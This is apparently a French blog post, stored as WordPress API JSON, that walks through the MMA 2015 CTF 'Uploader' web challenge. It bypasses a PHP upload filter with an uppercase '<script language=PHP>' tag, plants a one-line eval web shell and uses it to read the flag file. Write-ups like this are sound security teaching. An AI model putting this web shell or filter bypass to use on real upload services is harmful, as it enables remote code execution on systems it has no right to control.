{"id":809,"date":"2015-09-08T01:19:36","date_gmt":"2015-09-07T23:19:36","guid":{"rendered":"https:\/\/0x90r00t.com\/fr\/?p=809"},"modified":"2015-09-08T17:00:02","modified_gmt":"2015-09-08T15:00:02","slug":"mma-ctf-web-uploader-write-up","status":"publish","type":"post","link":"https:\/\/0x90r00t.com\/fr\/2015\/09\/08\/mma-ctf-web-uploader-write-up\/","title":{"rendered":"[MMA 2015] [Web – Uploader] Write Up"},"content":{"rendered":"

Description<\/h2>\n

Le script d’upload retire tous les \/<\\?|php\/. Donc, vous ne pouvez pas lancer du php.<\/p>\n

Vous pouvez seulement uploader des fichier dont le nom est captur\u00e9 par la regexp \/^[a-zA-Z0-9]+\\.[a-zA-Z0-9]+$\/.<\/p><\/blockquote>\n

<\/p>\n

Resolution<\/h2>\n

L’\u00e9nonc\u00e9 est clair, il faut r\u00e9ussir \u00e0 ex\u00e9cuter du php, malgr\u00e9 les regexp qui nous bloquent la route.<\/p>\n

Habituellement on utilise <?php, <? ou <?= pour d\u00e9buter un code php, la regexp supprimant \u00ab\u00a0<?\u00a0\u00bb et \u00ab\u00a0php\u00a0\u00bb on se retrouve vite coinc\u00e9.<\/p>\n

Un petit tour dans la documentation php<\/a> nous donne une piste, on peut voir que la synaxe \u00ab\u00a0<script language=php><\/code>\u00a0\u00bb pouvant passer la regexp a \u00e9t\u00e9 supprim\u00e9e en php 7. Cela tombe bien, les headers http de l’\u00e9preuve nous apprennent que c’est PHP\/5.5.9-1ubuntu4.11 qui est utilis\u00e9.<\/p>\n

On tente d’abord d’uploader un fichier contenant un petit \u00ab\u00a0<script language=php>echo time();<\/script><\/code>\u00a0\u00bb mais non, cela ne passe pas, la regexp nous supprime le mot php dans notre code.<\/p>\n

Oh mais, et si la regexp \u00e9tait sensible \u00e0 la casse ? Envoyons le mot PHP en majuscules…<\/p>\n

\r\n<script language=PHP>eval($_GET['q']);<\/script>\r\n<\/pre>\n
On tente alors de lire le flag, en passant \u00e0 notre script l’argument \u00ab\u00a0q=echo file_get_contents('\/flag');<\/code>\u00a0\u00bb<\/p>\n
\u00c7a fonctionne !<\/p>\n
Le flag est : MMA{you can run php from script tag}<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"
Description Le script d’upload retire tous les \/<\\?|php\/. Donc, vous ne pouvez pas lancer du php. Vous pouvez seulement uploader des fichier dont le nom est captur\u00e9 par la regexp \/^[a-zA-Z0-9]+\\.[a-zA-Z0-9]+$\/.<\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34,35,52],"tags":[47,19,54,55],"class_list":["post-809","post","type-post","status-publish","format-standard","hentry","category-2015-fr","category-ctf-fr","category-mma-2015-fr","tag-mma","tag-web","tag-php","tag-regexp"],"_links":{"self":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/809","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/comments?post=809"}],"version-history":[{"count":13,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/809\/revisions"}],"predecessor-version":[{"id":886,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/809\/revisions\/886"}],"wp:attachment":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/media?parent=809"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/categories?post=809"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/tags?post=809"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}